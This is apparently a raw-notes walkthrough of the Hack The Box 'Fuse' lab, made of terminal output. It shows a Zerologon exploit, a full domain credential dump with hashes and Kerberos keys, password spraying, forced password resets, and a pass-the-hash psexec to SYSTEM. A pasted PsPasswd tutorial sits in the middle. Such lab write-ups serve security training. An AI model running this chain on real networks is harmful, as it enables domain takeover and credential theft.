FUSE
unintended way : zerologon
┌─[✗]─[puck@parrot-lt]─[/opt/CVE-2020-1472]
└──╼ $python3 cve-2020-1472-exploit.py fuse 10.10.10.193
Performing authentication attempts...
=====================================================================================================================================================================================================================
Target vulnerable, changing account password to empty string
Result: 0
Exploit complete!
┌─[puck@parrot-lt]─[/opt/CVE-2020-1472]
┌─[puck@parrot-lt]─[~/htb/fuse] └──╼ $impacket-secretsdump -just-dc -no-pass fuse\$@10.10.10.193 Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation [-] RemoteOperations failed: SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.) [*] Cleaning up... ┌─[puck@parrot-lt]─[~/htb/fuse] └──╼ $impacket-secretsdump -just-dc -no-pass fuse\$@10.10.10.193 Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:370ddcf45959b2293427baa70376e14e::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:8ee7fac1bd38751dbff06b33616b87b0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: svc-print:1104:aad3b435b51404eeaad3b435b51404ee:38485fd7730cca53473d0fa6ed27aa71::: bnielson:1105:aad3b435b51404eeaad3b435b51404ee:8873f0c964ab36700983049e2edd0f77::: sthompson:1601:aad3b435b51404eeaad3b435b51404ee:5fb3cc8b2f45791e200d740725fdf8fd::: tlavel:1602:aad3b435b51404eeaad3b435b51404ee:8873f0c964ab36700983049e2edd0f77::: pmerton:1603:aad3b435b51404eeaad3b435b51404ee:e76e0270c2018153275aab1e143421b2::: svc-scan:1605:aad3b435b51404eeaad3b435b51404ee:38485fd7730cca53473d0fa6ed27aa71::: bhult:7101:aad3b435b51404eeaad3b435b51404ee:8873f0c964ab36700983049e2edd0f77::: dandrews:7102:aad3b435b51404eeaad3b435b51404ee:689583f00ad18c124c58405479b4c536::: mberbatov:7601:aad3b435b51404eeaad3b435b51404ee:b2bdbe60565b677dfb133866722317fd::: astein:7602:aad3b435b51404eeaad3b435b51404ee:2f74c867a93cda5a255b1d8422192d80::: dmuir:7603:aad3b435b51404eeaad3b435b51404ee:6320f0682f940651742a221d8218d161::: FUSE$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: [*] Kerberos keys grabbed Administrator:aes256-cts-hmac-sha1-96:e6dcafd3738f9433358d59ef8015386a8c0a418a09b3e8968f8a00c6fa077984 Administrator:aes128-cts-hmac-sha1-96:83c4a7c2b6310e0b2323d7c67c9a8d68 Administrator:des-cbc-md5:0dfe83ce576d8aae krbtgt:aes256-cts-hmac-sha1-96:5a844c905bc3ea680729e0044a00a817bb8e6b8a89c01b0d2f949e2d7ac9952e krbtgt:aes128-cts-hmac-sha1-96:67f0c1ace3b5a9f43e90a00c1e5445c6 krbtgt:des-cbc-md5:49d93d43321f02b3 svc-print:aes256-cts-hmac-sha1-96:f06c128c73c7a4a2a6817ee22ce59979eac9789adf7043acbf11721f3b07b754 svc-print:aes128-cts-hmac-sha1-96:b662d12fedf3017aed71b2bf96ac6a99 svc-print:des-cbc-md5:fea11fdf6bd3105b bnielson:aes256-cts-hmac-sha1-96:62aef12b7b5d68fe508b5904d2966a27f98ad83b5ca1fb9930bbcf420c2a16b6 bnielson:aes128-cts-hmac-sha1-96:70140834e3319d7511afa5c5b9ca4b32 bnielson:des-cbc-md5:9826c42010254a76 sthompson:aes256-cts-hmac-sha1-96:e93eb7d969f30a4acb55cff296599cc31f160cca523a63d3b0f9eba2787e63a5 sthompson:aes128-cts-hmac-sha1-96:a8f79b1eb4209a0b388d1bb99b94b0d9 sthompson:des-cbc-md5:4f9291c46291ba02 tlavel:aes256-cts-hmac-sha1-96:f415075d6b6566912c97a4e9a0249b2b209241c341534cb849b657711de11525 tlavel:aes128-cts-hmac-sha1-96:9ac52b65b9013838f129bc9a99826a4f tlavel:des-cbc-md5:2a238576ab7a6213 pmerton:aes256-cts-hmac-sha1-96:102465f59909683f260981b1d93fa7d0f45778de11b636002082575456170db7 pmerton:aes128-cts-hmac-sha1-96:4dc80267b0b2ecc02e437aef76714710 pmerton:des-cbc-md5:ef3794940d6d0120 svc-scan:aes256-cts-hmac-sha1-96:053a97a7a728359be7aa5f83d3e81e81637ec74810841cc17acd1afc29850e5c svc-scan:aes128-cts-hmac-sha1-96:1ae5f4fecd5b3bd67254d21f6adb6d56 svc-scan:des-cbc-md5:e30b208ccecd57ad bhult:aes256-cts-hmac-sha1-96:f1097eb00e508bf95f4756a28f18f490c40ed3274b2fd67da8919647591e2c74 bhult:aes128-cts-hmac-sha1-96:b1f2affb4c9d4c70b301923cc5d89336 bhult:des-cbc-md5:4a1a209d4532a7b9 dandrews:aes256-cts-hmac-sha1-96:d2c7389d3185d2e68e47d227d817556349967cac1d5bfacb780aaddffeb34dce dandrews:aes128-cts-hmac-sha1-96:497bd974ccfd3979edb0850dc65fa0a8 dandrews:des-cbc-md5:9ec2b53eae6b20f2 mberbatov:aes256-cts-hmac-sha1-96:11abccced1c06bfae96b0309c533812976b5b547d2090f1eaa590938afd1bc4a mberbatov:aes128-cts-hmac-sha1-96:fc50f72a3f79c2abc43d820f849034da mberbatov:des-cbc-md5:8023a16b9b3d5186 astein:aes256-cts-hmac-sha1-96:7f43bea8fd662b275434644b505505de055cdfa39aeb0e3794fec26afd077735 astein:aes128-cts-hmac-sha1-96:0d27194d0733cf16b5a19281de40ad8b astein:des-cbc-md5:254f802902f8ec7a dmuir:aes256-cts-hmac-sha1-96:67ffc8759725310ba34797753b516f57e0d3000dab644326aea69f1a9e8fedf0 dmuir:aes128-cts-hmac-sha1-96:692fde98f45bf520d494f50f213c6762 dmuir:des-cbc-md5:7fb515d59846498a FUSE$:aes256-cts-hmac-sha1-96:ba250f2101ecad1a2aa8fab0c95d7a66b59c904eb0edd47121f51ff561f3fb2e FUSE$:aes128-cts-hmac-sha1-96:bf995eed47e2a8849b72e95eabd5a929 FUSE$:des-cbc-md5:b085ab974ff1e049 [*] Cleaning up... ┌─[puck@parrot-lt]─[~/htb/fuse]
1st a nmap scan
E:\PENTEST>nmap 10.10.10.193 Starting Nmap 7.70 ( https://nmap.org ) at 2020-06-17 11:38 W. Europe Summer Time Nmap scan report for fuse.fabricorp.local (10.10.10.193) Host is up (0.089s latency). Not shown: 988 filtered ports PORT STATE SERVICE 53/tcp open domain 80/tcp open http 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 636/tcp open ldapssl 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl Nmap done: 1 IP address (1 host up) scanned in 19.86 seconds E:\PENTEST>
enumerate more
root@kali:~/htb/fuse# nmap -p53,80,88,135,139,389,445,3389 -A -T4 fabricorp.local Starting Nmap 7.70 ( https://nmap.org ) at 2020-06-17 05:56 EDT Nmap scan report for fabricorp.local (10.10.10.193) Host is up (0.086s latency). rDNS record for 10.10.10.193: fuse.fabricorp.local PORT STATE SERVICE VERSION 53/tcp open domain? | fingerprint-strings: | DNSVersionBindReqTCP: | version |_ bind 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Site doesn't have a title (text/html). 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-06-17 10:13:52Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name) 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP) 3389/tcp filtered ms-wbt-server 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.70%I=7%D=6/17%Time=5EE9E8E5%P=x86_64-pc-linux-gnu%r(DNSV SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\ SF:x04bind\0\0\x10\0\x03"); Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2016|2012|2008|10 (91%) OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_10:1607 Aggressive OS guesses: Microsoft Windows Server 2016 (91%), Microsoft Windows Server 2012 (85%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows 10 1607 (85%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 2h37m05s, deviation: 4h02m32s, median: 17m03s | smb-os-discovery: | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3) | Computer name: Fuse | NetBIOS computer name: FUSE\x00 | Domain name: fabricorp.local | Forest name: fabricorp.local | FQDN: Fuse.fabricorp.local |_ System time: 2020-06-17T03:16:16-07:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: required | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2020-06-17 06:16:14 |_ start_date: 2020-06-17 00:32:55 TRACEROUTE (using port 135/tcp) HOP RTT ADDRESS 1 85.26 ms 10.10.14.1 2 85.44 ms fuse.fabricorp.local (10.10.10.193) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 189.81 seconds root@kali:~/htb/fuse#
.
┌─[✗]─[puck@parrot-lt]─[/opt/CVE-2020-1472]
└──╼ $python3 cve-2020-1472-exploit.py fuse 10.10.10.193
Performing authentication attempts…
=====================================================================================================================================================================================================================
Target vulnerable, changing account password to empty string
Result: 0
Exploit complete!
┌─[puck@parrot-lt]─[/opt/CVE-2020-1472]
.
=> users : pmerton , tlavel , bnielson
check for more users
E:\PENTEST>kerbrute_windows_amd64.exe userenum --dc fabricorp.local -d fabricorp userlist.txt __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ / ,< / __/ / / /_/ / / / /_/ / /_/ __/ /_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ Version: v1.0.3 (9dad6e1) - 06/17/20 - Ronnie Flathers @ropnop 2020/06/17 12:06:02 > Using KDC(s): 2020/06/17 12:06:02 > fabricorp.local:88 2020/06/17 12:06:21 > [+] VALID USERNAME: administrator@fabricorp 2020/06/17 12:08:31 > [+] VALID USERNAME: Administrator@fabricorp 2020/06/17 12:16:07 > [+] VALID USERNAME: sthompson@fabricorp 2020/06/17 12:22:27 > [+] VALID USERNAME: fuse@fabricorp 2020/06/17 12:22:27 > [+] VALID USERNAME: bhult@fabricorp 2020/06/17 12:22:43 > Done! Tested 100000 usernames (5 valid) in 1001.177 seconds
combined
E:\PENTEST>kerbrute_windows_amd64.exe userenum --dc fabricorp.local -d fabricorp userlistsmall.txt __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ / ,< / __/ / / /_/ / / / /_/ / /_/ __/ /_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ Version: v1.0.3 (9dad6e1) - 06/17/20 - Ronnie Flathers @ropnop 2020/06/17 12:27:46 > Using KDC(s): 2020/06/17 12:27:46 > fabricorp.local:88 2020/06/17 12:27:46 > [+] VALID USERNAME: fuse@fabricorp 2020/06/17 12:27:46 > [+] VALID USERNAME: Administrator@fabricorp 2020/06/17 12:27:46 > [+] VALID USERNAME: tlavel@fabricorp 2020/06/17 12:27:46 > [+] VALID USERNAME: sthompson@fabricorp 2020/06/17 12:27:46 > [+] VALID USERNAME: pmerton@fabricorp 2020/06/17 12:27:46 > [+] VALID USERNAME: bnielson@fabricorp 2020/06/17 12:27:46 > [+] VALID USERNAME: bhult@fabricorp 2020/06/17 12:27:46 > Done! Tested 9 usernames (7 valid) in 0.153 seconds
.
check if any of these 7 have UF_DONT_REQUIRE_PREAUTH set
root@kali:~/htb/fuse# GetNPUsers.py -dc-ip 10.10.10.193 -no-pass FABRICORP.LOCAL/bnielson Impacket v0.9.22.dev1+20200428.191254.96c7a512 - Copyright 2020 SecureAuth Corporation [*] Getting TGT for bnielson [-] User bnielson doesn't have UF_DONT_REQUIRE_PREAUTH set
.
E:\PENTEST>crackmapexec.exe 10.10.10.193 -u usernames.txt -p Fabricorp01 06-17-2020 14:20:32 [*] 10.10.10.193:445 is running Windows 10.0 Build 14393 (name:FUSE) (domain:FABRICORP) 06-17-2020 14:20:34 [-] 10.10.10.193:445 FABRICORP\fuse:Fabricorp01 SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.) 06-17-2020 14:20:34 [-] 10.10.10.193:445 FABRICORP\Administrator:Fabricorp01 SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.) 06-17-2020 14:20:35 [-] 10.10.10.193:445 FABRICORP\tlavel:Fabricorp01 SMB SessionError: STATUS_PASSWORD_MUST_CHANGE(The user password must be changed before logging on the first time.) 06-17-2020 14:20:35 [-] 10.10.10.193:445 FABRICORP\sthompson:Fabricorp01 SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.) 06-17-2020 14:20:35 [-] 10.10.10.193:445 FABRICORP\pmerton:Fabricorp01 SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.) 06-17-2020 14:20:35 [-] 10.10.10.193:445 FABRICORP\bnielson:Fabricorp01 SMB SessionError: STATUS_PASSWORD_MUST_CHANGE(The user password must be changed before logging on the first time.) 06-17-2020 14:20:35 [-] 10.10.10.193:445 FABRICORP\bhult:Fabricorp01 SMB SessionError: STATUS_PASSWORD_MUST_CHANGE(The user password must be changed before logging on the first time.)
.
tried but failed
Remote Windows Systems Using SyInternals PsPasswd
We all know that a good Administrator will find a way to automate or make boring tasks easy. Changing passwords on Windows systems, usually Administrator accounts, is one of those we least like to do but have to for audit purposes and also when other administrators leave.
Well, here is another tool that can help with changing passwords. The free utility PsPasswd is part of Microsoft’s SysInternal’s PsTools that lets you change an account password on the local or remote systems, to enable admin’s to create batch files that run PsPasswd against the computers they manage to perform a mass change of the administrator password.
And for security, PsPasswd does not send passwords over the network in the clear. You can use PsPasswd to change the password of a local or domain account on the local or a remote computer.
So how does it work?
usage: pspasswd [[\\computer[,computer[,..] | @file [-u user [-p psswd]]] Username [NewPassword]
computer – Perform the command on the remote computer or computers specified. If you omit the computer name the command runs on the local system, and if you specify a wildcard (\\*), the command runs on all computers in the current domain.
@file – Run the command on each computer listed in the text file specified.
-u – Specifies optional user name for login to remote computer.
-p – Specifies optional password for user name. If you omit this you will be prompted to enter a hidden password.
Username – Specifies name of account for password change.
NewPassword – New password. If ommitted a NULL password is applied.
So say we wanted to change the password on a server.
1
|
pspasswd \\win2008tst –u myadmin –p myadmpasswd Administrator newpasswd
|
That’s all. Now say we don’t want to pass the password on the command line, then omit the -p and a popup will prompt you for the password.
E:\PENTEST>pspasswd \\10.10.10.193 -u tlavel -p Fabricorp01 tlavel F!bricorp02! PsPasswd v1.24 - Local and remote password changer Copyright (C) 2003-2016 Mark Russinovich Sysinternals - www.sysinternals.com Error changing password: Access is denied. E:\PENTEST>
.
tried
root@kali:~/htb# smbpasswd -r 10.10.10.193 -U bnielson Old SMB password:Fabricorp01 New SMB password:1234567 Retype new SMB password: machine 10.10.10.193 rejected the password change: Error was : When trying to update a password, this status indicates that some password update rule has been violated. For example, the password might not meet length criteria..
root@kali:~/htb# smbpasswd -r 10.10.10.193 -U bnielson Old SMB password:Fabricorp01 New SMB password:Fabricorp02 Retype new SMB password: Fabricorp01 Password changed for user bnielson on 10.10.10.193.
.
root@kali:~/htb# smbpasswd -r 10.10.10.193 -U bnielson Old SMB password:Fabricorp01 New SMB password:Fabricorp02 Retype new SMB password:Fabricorp02 Password changed for user bnielson on 10.10.10.193. root@kali:~/htb# smbclient //10.10.10.193/print$ -U bnielson WARNING: The "syslog" option is deprecated Enter WORKGROUP\bnielson's password: Fabricorp02 Try "help" to get a list of possible commands. smb: \> ls . D 0 Fri May 29 20:12:41 2020 .. D 0 Fri May 29 20:12:41 2020 color D 0 Sat Jul 16 09:18:08 2016 IA64 D 0 Fri May 29 20:12:41 2020 W32X86 D 0 Mon Jun 1 05:03:44 2020 x64 D 0 Mon Jun 1 05:03:46 2020 10340607 blocks of size 4096. 7554925 blocks available smb: \>
.
rpcclient -U “bnielson” 10.10.10.193
root@kali:~/htb# rpcclient -U "bnielson" 10.10.10.193 Enter WORKGROUP\bnielson's password:Fabricorp02 rpcclient $> ls command not found: ls rpcclient $> help --------------- ---------------------- CLUSAPI clusapi_open_cluster bla clusapi_get_cluster_name bla -snip- rpcclient $> rpcclient $> enumdomusers user:[Administrator] rid:[0x1f4] user:[Guest] rid:[0x1f5] user:[krbtgt] rid:[0x1f6] user:[DefaultAccount] rid:[0x1f7] user:[svc-print] rid:[0x450] user:[bnielson] rid:[0x451] user:[sthompson] rid:[0x641] user:[tlavel] rid:[0x642] user:[pmerton] rid:[0x643] user:[svc-scan] rid:[0x645] user:[bhult] rid:[0x1bbd] user:[dandrews] rid:[0x1bbe] user:[mberbatov] rid:[0x1db1] user:[astein] rid:[0x1db2] user:[dmuir] rid:[0x1db3] rpcclient $>
.
rpcclient $> enumprinters flags:[0x800000] name:[\\10.10.10.193\HP-MFT01] description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)] comment:[]
.
root@kali:/opt/evil-winrm# ruby evil-winrm.rb -i 10.10.10.193 -u svc-print Enter Password: $fab@s3Rv1ce$1 Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\svc-print\Documents> cd .. *Evil-WinRM* PS C:\Users\svc-print> cd desktop *Evil-WinRM* PS C:\Users\svc-print\desktop> dir Directory: C:\Users\svc-print\desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 6/17/2020 11:49 PM 34 user.txt *Evil-WinRM* PS C:\Users\svc-print\desktop> type user.txt 867719f8b9ef372cd05d1e30997c7d28 *Evil-WinRM* PS C:\Users\svc-print\desktop>
.
root@kali:~/htb/fuse# psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:370ddcf45959b2293427baa70376e14e Administrator@10.10.10.193 Impacket v0.9.22.dev1+20200428.191254.96c7a512 - Copyright 2020 SecureAuth Corporation [*] Requesting shares on 10.10.10.193..... [*] Found writable share ADMIN$ [*] Uploading file VwvVtgEd.exe [*] Opening SVCManager on 10.10.10.193..... [*] Creating service fhoH on 10.10.10.193..... [*] Starting service fhoH..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami nt authority\system C:\Windows\system32>cd c:\users\desktop The system cannot find the path specified. C:\Windows\system32>cd c:\users c:\Users>cd Administrator c:\Users\Administrator>cd desktop c:\Users\Administrator\Desktop>dir Volume in drive C has no label. Volume Serial Number is E6C8-44FE Directory of c:\Users\Administrator\Desktop 06/01/2020 02:03 AM <DIR> . 06/01/2020 02:03 AM <DIR> .. 06/17/2020 11:49 PM 34 root.txt 1 File(s) 34 bytes 2 Dir(s) 30,865,776,640 bytes free c:\Users\Administrator\Desktop>type root.txt 2b81c0276298df3453ae7da86e9babf4 c:\Users\Administrator\Desktop> .
.
c:\tja>pwdump8 PwDump v8.2 - dumps windows password hashes - by Fulvio Zanetti & Andrea Petralia @ http://www.blackMath.it Administrator:500:AAD3B435B51404EEAAD3B435B51404EE:521A94AF0CFA785A1EEC638D803E482C Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0 DefaultAccount:503:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
.